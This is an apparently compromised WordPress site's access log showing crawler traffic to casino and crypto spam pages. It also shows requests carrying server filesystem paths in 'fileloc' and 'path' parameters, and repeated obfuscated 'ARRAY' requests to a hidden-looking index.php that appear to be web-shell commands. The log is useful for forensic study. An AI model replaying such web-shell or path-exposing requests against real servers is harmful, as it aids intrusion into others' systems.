66.249.73.173 - - [17/Apr/2026:12:49:11 +0300] "GET /shop/gwyniad/behight624077511649.html HTTP/1.1" 200 29119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [17/Apr/2026:12:47:29 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432323834392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393234392q3931343730623761383135656336376539323062316363636436626561396464222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
17.22.245.118 - - [17/Apr/2026:12:49:30 +0300] "GET /discover-the-unique-benefits-of-using-sushiswap-dex/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/SimplePie HTTP/1.1" 200 5518 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.191.171.12 - - [17/Apr/2026:12:49:31 +0300] "GET /decoding-dexscreener-your-ultimate-dex-scanner-guide/ HTTP/1.1" 200 8757 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
17.22.253.20 - - [17/Apr/2026:12:49:33 +0300] "GET /discover-the-ultimate-power-of-dexscreener-for-traders/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/themes HTTP/1.1" 200 4564 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.253.52 - - [17/Apr/2026:12:49:36 +0300] "GET /kak-bezopasno-ispol-zovat-kraken-darknet-v-2026-godu/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes HTTP/1.1" 200 17636 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.237.82 - - [17/Apr/2026:12:49:40 +0300] "GET /discover-the-power-of-solscan-for-crypto-tracking/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-admin/maint HTTP/1.1" 200 4236 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.93 - - [17/Apr/2026:12:49:42 +0300] "GET /%D1%83%D0%B2%D0%B5%D0%BB%D0%B8%D1%87%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BC%D0%BE%D0%B1%D0%B8%D0%BB%D1%8C%D0%BD%D1%8B%D1%85-%D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%BE-%D0%BA%D0%B0%D0%B7%D0%B8%D0%BD%D0%BE-%D0%BD/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-admin/images HTTP/1.1" 200 7907 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.76 - - [17/Apr/2026:12:49:46 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Ferror_docs%2Fforbidden.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Ferror_docs HTTP/2" 200 5374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:49:48 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fth-ac23eee47530ac63a1178c827db28087.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3064 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.194 - - [17/Apr/2026:12:49:50 +0300] "GET /casino-admiral-recenze/ HTTP/1.1" 200 8752 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.216.113.70 - - [17/Apr/2026:12:47:51 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432323837312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393237312q3235306234373636373563336463343236663035386434393337303335643131222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:49:51 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fimages%2Fbrowser-rtl.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/2" 200 2832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:49:54 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fja-e2791ba830489d23043be8650a22a22b.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3191 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.68.247.213 - - [17/Apr/2026:12:50:03 +0300] "GET /article-how-to-get-rid-of-crabgrass-for-good/ HTTP/2" 200 6994 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.76 - - [17/Apr/2026:12:50:04 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentythree-ko_KR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2849 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.241.219.24 - - [17/Apr/2026:12:50:10 +0300] "GET /unlocking-the-secrets-of-online-gambling-a-comprehensive-guide-by-unknown/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-admin/css/colors HTTP/1.1" 200 4746 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.76 - - [17/Apr/2026:12:50:12 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Ffi-ac23eee47530ac63a1178c827db28087.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3067 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:48:13 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432323839332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393239332q3031623162393962366239653764616432616239323763316336643733333564222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:50:13 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-it_IT.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 19568 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:50:16 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fel.l10n.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 121986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:50:19 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fja-f575f481034e90e21d832e415fd95fcf.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3212 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:50:33 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-tr_TR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 2831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:48:35 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432323931352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393331352q6666373232633066313831393537633864373861386637636563326132623139222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:50:36 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fuk-e2e4c4b80f3adf2c70b431bfdb1b4872.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:50:39 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fnl_NL.l10n.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 96616 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.201 - - [17/Apr/2026:12:50:40 +0300] "GET /us-no-deposit-totally-free-dragon-island-bonus-revolves-incentives-finest-gambling-establishment-also-offers-in-the-2026/ HTTP/1.1" 200 8756 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:50:42 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fmaint%2Frepair.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fmaint HTTP/2" 200 5649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:48:57 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432323933372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393333372q6639323565313639386162663765336336386330663730376162323032646636222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
85.208.96.196 - - [17/Apr/2026:12:50:57 +0300] "GET /revolutionary-jupiter-swap-elevate-your-trading-experience/ HTTP/1.1" 200 8743 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:51:08 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-fr_FR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 2835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:51:09 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-pt_BR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.172 - - [17/Apr/2026:12:51:08 +0300] "GET /shop/amortizement/disorganized202260636490.html HTTP/1.1" 200 29170 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:51:12 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-id_ID.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 2832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:51:15 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-zh_CN.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 19927 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.241.75.131 - - [17/Apr/2026:12:51:17 +0300] "GET /discover-the-features-of-solscan-for-crypto-enthusiasts/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages/continents-cities-it_IT.po&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages HTTP/1.1" 200 11229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.76 - - [17/Apr/2026:12:51:18 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-zh_TW.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:49:19 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432323935392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393335392q6435333838363633653934316230386635383164383532656463666164373835222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:51:21 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-sv_SE.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:51:24 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Ferror_docs%2Finternal_server_error.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Ferror_docs HTTP/2" 200 5545 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.80.16.166 - - [17/Apr/2026:12:51:25 +0300] "GET /robots.txt HTTP/1.1" 200 541 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Gort)"
216.73.216.76 - - [17/Apr/2026:12:51:27 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fja-5251f7623766a714c8207c7edb938628.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3303 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:51:30 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fvi-e2e4c4b80f3adf2c70b431bfdb1b4872.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3639 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:51:33 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-id_ID.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:51:36 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fsitemaps%2Fclass-wp-sitemaps-provider.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fsitemaps HTTP/2" 200 4268 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:51:39 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2FRequests%2FUtility%2FCaseInsensitiveDictionary.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2FRequests%2FUtility HTTP/2" 200 3530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:51:42 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2FRequests%2FUtility%2FFilteredIterator.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2FRequests%2FUtility HTTP/2" 200 3330 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:49:41 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432323938312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393338312q3966396465643562636232396630333562653232373136633030333131616333222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.173 - - [17/Apr/2026:12:51:41 +0300] "GET /shop/manchet/unprecedentedly282755059339.html HTTP/1.1" 200 29215 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.19.237 - - [17/Apr/2026:12:51:46 +0300] "GET /unlocking-the-secrets-of-casino-strategies-for-winning-big/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-admin/js HTTP/1.1" 200 8946 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
85.208.96.201 - - [17/Apr/2026:12:51:47 +0300] "GET /robots.txt HTTP/1.1" 200 541 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.196 - - [17/Apr/2026:12:51:48 +0300] "GET /kraken-aktual-naia-informatsiia-i-rabochie-ssylki-2026/ HTTP/1.1" 200 8761 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:51:53 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-fi.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 19736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:02 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-ko_KR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 2833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.160 - - [17/Apr/2026:12:52:02 +0300] "GET /shop/machinate/changeably192809887780.html HTTP/1.1" 200 30726 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [17/Apr/2026:12:50:03 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333030332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393430332q3137386366353166373966633030616538343962363561323266636534663738222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:52:04 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal%2Fcode.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal HTTP/2" 200 2841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.59.204.130 - - [17/Apr/2026:12:52:04 +0300] "GET /8776/ HTTP/2" 200 6970 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.76 - - [17/Apr/2026:12:52:07 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fvi-f575f481034e90e21d832e415fd95fcf.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:10 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fimages%2Fgeneric.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/2" 200 2831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:13 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-zh_CN.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 12345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:16 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Ffi-0cc31205f20441b3df1d1b46100f6b8d.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
